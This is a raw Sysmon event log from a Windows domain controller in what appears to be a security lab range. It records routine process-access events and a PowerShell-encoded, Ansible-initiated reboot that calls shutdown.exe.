08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000540Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000539Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000538Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000537Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000536Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000535Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-1503-000000007E01}4028C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000534Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000533Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.962{5D479F2C-167B-5F84-1403-000000007E01}14964124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-167B-5F84-1503-000000007E01}4028C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3698331a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e241a4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e23e75(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+368d54da(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35de4a0b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e42eda(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e2653f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e2653f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e263d0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e18355(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e24888(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e2447b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e241a4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e23e75(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+368d54da(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e0acd6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35e0a2a6(wow64) 154100x8000000000000000532Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.964{5D479F2C-167B-5F84-1503-000000007E01}4028C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 10341000x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.899{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000530Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.899{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000529Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.868{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0dn0t03m.cft.ps12020-10-12 08:40:27.868 10341000x8000000000000000528Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.853{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000527Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000526Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000525Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000524Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000523Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000522Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 